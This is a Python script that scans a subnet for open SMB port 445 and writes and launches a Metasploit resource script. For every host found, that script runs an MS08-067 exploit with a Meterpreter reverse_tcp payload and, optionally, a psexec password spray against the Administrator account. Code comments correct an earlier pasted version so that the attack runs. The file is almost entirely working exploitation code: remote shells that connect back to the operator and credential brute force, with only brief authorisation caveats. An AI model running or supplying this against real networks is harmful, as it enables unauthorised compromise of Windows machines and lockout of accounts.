import argparse
import os
import subprocess
import sys

import nmap
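def findTgts(subnet, port=445):
    """Return the hosts in *subnet* that nmap reports with TCP/``port`` open.

    Args:
        subnet: nmap target specification (single address, CIDR block or range).
        port: TCP port to probe. Defaults to 445 (SMB), which is what the
            exploit modules written by the rest of this script need.

    Returns:
        list[str] of host addresses whose port state is exactly ``'open'``.
        Hosts reported as closed/filtered, or with no TCP result at all, are
        dropped.

    This is an active probe of every address in the range: only run it
    against networks you are authorised to test.
    """
    scanner = nmap.PortScanner()
    # python-nmap wants the port spec as a string but keys results by int.
    scanner.scan(subnet, str(port))
    return [
        host
        for host in scanner.all_hosts()
        if scanner[host].has_tcp(port)
        and scanner[host]['tcp'][port]['state'] == 'open'
    ]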
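def setupHandler(configFile, lhost, lport):
    """Write the msfconsole commands that start one background Meterpreter listener.

    Args:
        configFile: open, writable text file (the resource script being built).
        lhost: address the reverse_tcp payload should connect back to.
        lport: listener port; passed through ``str()`` so ints and strings both work.

    The handler is started as a job (``exploit -j -z``) and then
    ``setg DisablePayloadHandler 1`` tells every exploit module written
    afterwards to reuse it instead of each trying to bind the same port.
    """
    # msfconsole's documented syntax is `set NAME VALUE`; the `NAME=VALUE`
    # spelling this paste used is not reliable across Metasploit versions.
    configFile.writelines([
        'use exploit/multi/handler\n',
        'set PAYLOAD windows/meterpreter/reverse_tcp\n',
        'set LHOST ' + str(lhost) + '\n',
        'set LPORT ' + str(lport) + '\n',
        'exploit -j -z\n',
        'setg DisablePayloadHandler 1\n',
    ])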
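def confickerExploit(configFile, tgtHost, lhost, lport):
    """Write an MS08-067 (ms08_067_netapi) exploit job against one host.

    Args:
        configFile: open, writable text file (the resource script being built).
        tgtHost: target address; anything ``str()`` can render.
        lhost: address the reverse_tcp payload connects back to.
        lport: port of the handler started by ``setupHandler``.

    MS08-067 only affects unpatched pre-2009 Windows; on a patched host the
    module simply reports the target as not vulnerable. The job runs in the
    background (``-j -z``) so the rest of the script is not blocked.
    """
    # Fixes two defects in the pasted version: the LHOST line was spelled
    # `lhhost` (so the payload never got a callback address) and every option
    # used the unreliable `NAME=VALUE` form instead of `set NAME VALUE`.
    # RHOST is kept for compatibility; newer Metasploit names the option
    # RHOSTS (RHOST is accepted as an alias there, as far as I can tell).
    configFile.writelines([
        'use exploit/windows/smb/ms08_067_netapi\n',
        'set RHOST ' + str(tgtHost) + '\n',
        'set PAYLOAD windows/meterpreter/reverse_tcp\n',
        'set LHOST ' + str(lhost) + '\n',
        'set LPORT ' + str(lport) + '\n',
        'exploit -j -z\n',
    ])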
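def smbBrute(configFile, tgtHost, passFile, lhost, lport):
    """Write one psexec job per candidate password for the local Administrator.

    Args:
        configFile: open, writable text file (the resource script being built).
        tgtHost: target address.
        passFile: path to a newline-separated wordlist; blank lines are skipped
            because ``set SMBPass`` with no value would leave the previous
            password in place rather than clearing it.
        lhost: address the reverse_tcp payload connects back to.
        lport: port of the handler started by ``setupHandler``.

    Raises:
        IOError/OSError: if *passFile* cannot be opened.

    Every line is a separate login attempt against SMB, so this will trip
    account-lockout policies and is extremely noisy; it is a spray, not a
    stealthy check. Passwords containing leading/trailing whitespace or
    quote characters are passed through as-is and may not survive
    msfconsole's argument splitting.
    """
    user = 'Administrator'
    with open(passFile, 'r') as pF:
        for line in pF:
            password = line.strip('\r\n')
            if not password:
                continue
            # Module path is exploit/windows/smb/psexec; the pasted 'ps_exec'
            # is not a Metasploit module. The original also wrote
            # 'set SMBPass<password>' with no separator, so no password was
            # ever actually set.
            configFile.writelines([
                'use exploit/windows/smb/psexec\n',
                'set RHOST ' + str(tgtHost) + '\n',
                'set SMBUser ' + str(user) + '\n',
                'set SMBPass ' + password + '\n',
                'set PAYLOAD windows/meterpreter/reverse_tcp\n',
                'set LHOST ' + str(lhost) + '\n',
                'set LPORT ' + str(lport) + '\n',
                'exploit -j -z\n',
            ])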
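def main():
    """Command-line entry point.

    Scans ``--rhost`` for SMB (TCP/445), writes a Metasploit resource script
    ``Conf.rc`` in the current directory that starts one reverse_tcp handler
    and queues an MS08-067 attempt for every live target — plus a psexec
    password spray when ``--password`` is given — and then hands the script
    to ``msfconsole -r``.

    Exits with status 1 when ``--rhost`` is missing or no host in the range
    has port 445 open.
    """
    parser = argparse.ArgumentParser(prog='Metasploittest')
    # NOTE: the loopback default is only useful for a local lab; a reverse
    # shell from a remote target to 127.0.0.1 never reaches this machine.
    parser.add_argument('-lh', '--lhost', help='Your own IP', default='127.0.0.1')
    parser.add_argument('-lp', '--lport', help='Your own Port')
    parser.add_argument('-rh', '--rhost', help='The IP to be attacked')
    parser.add_argument('-pf', '--password', help='The password file to be used')
    args = parser.parse_args()

    lhost = args.lhost
    # Kept as a string: it is only ever interpolated into the resource script.
    lport = args.lport if args.lport is not None else '1337'
    rhost = args.rhost
    passFile = args.password

    if rhost is None:
        # print_help() writes the usage text itself; the pasted version
        # printed its return value (None) as a second line.
        parser.print_help()
        sys.exit(1)

    tgtHosts = findTgts(rhost)
    if not tgtHosts:
        print('No hosts with TCP/445 open in ' + rhost + '; nothing to do.')
        sys.exit(1)

    # Open the script only once there is something to write and close it
    # before launching msfconsole; the original opened it before argument
    # parsing, leaving an empty Conf.rc behind on every usage error.
    with open('Conf.rc', 'w') as configFile:
        setupHandler(configFile, lhost, lport)
        for tgtHost in tgtHosts:
            confickerExploit(configFile, tgtHost, lhost, lport)
            # Password spraying is optional; the pasted version required the
            # wordlist and then re-checked it inside the loop.
            if passFile is not None:
                smbBrute(configFile, tgtHost, passFile, lhost, lport)

    # Conf.rc now holds every candidate password in clear text; delete it
    # when the engagement is over.
    # Argument list rather than a shell string: nothing here is user
    # controlled today, and this keeps it that way if the path is ever
    # made configurable.
    subprocess.call(['msfconsole', '-r', 'Conf.rc'])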
# Entry guard: the helpers above can be imported (e.g. for testing) without
# triggering a scan or launching msfconsole.
if __name__ == "__main__":
    main()